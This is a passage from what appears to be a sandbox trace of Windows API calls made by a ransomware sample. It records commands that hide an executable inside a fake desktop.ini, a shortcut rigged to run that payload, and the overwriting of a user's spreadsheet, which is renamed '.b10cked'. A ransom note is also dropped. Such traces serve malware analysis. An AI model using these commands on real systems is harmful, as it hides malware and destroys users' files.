\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x910, dwThreadId=0x90c)) returned 1 [0128.453] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0129.268] CloseHandle (hObject=0x114) returned 1 [0129.268] CloseHandle (hObject=0x110) returned 1 [0129.268] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.268] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0129.269] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0129.269] GetTickCount () returned 0x295d8 [0129.269] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18605792672) returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x77\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0129.269] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0129.269] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" & type \"WxMD5ucxt4TTzYn6xhkt\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x79 | out: lpsz="EXPLORER.EXE \"WXMD5UCXT4TTZYN6XHKT\" & TYPE \"WXMD5UCXT4TTZYN6XHKT\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x79 [0129.269] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0129.269] CharUpperBuffW (in: lpsz="explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" & type \"WxMD5ucxt4TTzYn6xhkt\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x7a | out: lpsz="EXPLORER.EXE \"WXMD5UCXT4TTZYN6XHKT\" & TYPE \"WXMD5UCXT4TTZYN6XHKT\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x7a [0129.269] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0129.269] CoInitialize (pvReserved=0x0) returned 0x0 [0129.269] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0129.271] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0129.271] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0129.271] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"WxMD5ucxt4TTzYn6xhkt\" & type \"WxMD5ucxt4TTzYn6xhkt\\desktop.ini\" > \"%TEMP%\\DwnCwJm8.exe\" && \"%TEMP%\\DwnCwJm8.exe\"") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0129.273] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0129.273] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0129.273] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt.lnk", fRemember=0) returned 0x0 [0129.279] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0129.279] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0129.279] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0129.279] CoUninitialize () [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0129.280] ReleaseMutex (hMutex=0xf8) returned 1 [0129.280] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7jmxgwy9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0129.280] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.280] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18606982281) returned 1 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13545 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0129.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1305d [0129.282] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13545 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13545 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0129.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0129.283] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9aa1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0129.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9aa1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39585, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9aa4 [0129.284] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9aa1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39585, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9aa4 [0129.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9aa1, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9aa1, lpOverlapped=0x0) returned 1 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7jmxgwY9.xlsx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7jmxgwY9.xlsx", cchWideChar=13, lpMultiByteStr=0x131326c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7jmxgwY9.xlsx", lpUsedDefaultChar=0x0) returned 13 [0129.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13545 [0129.288] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0129.288] CloseHandle (hObject=0x114) returned 1 [0129.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\7jmxgwY9.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS") returned 0x26 [0129.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.290] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x7b8, dwThreadId=0x7dc)) returned 1 [0129.291] CloseHandle (hObject=0x110) returned 1 [0129.291] CloseHandle (hObject=0x114) returned 1 [0129.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0129.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0129.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 1 [0129.292] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0129.292] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0129.292] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0129.292] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0129.292] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0129.292] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0129.292] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0129.292] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0129.292] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0129.292] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x938, dwThreadId=0x8b8)) returned 1 [0129.293] CloseHandle (hObject=0x110) returned 1 [0129.293] CloseHandle (hObject=0x114) returned 1 [0129.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0xffffffff [0129.294] GetLastError () returned 0x2 [0129.294] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: 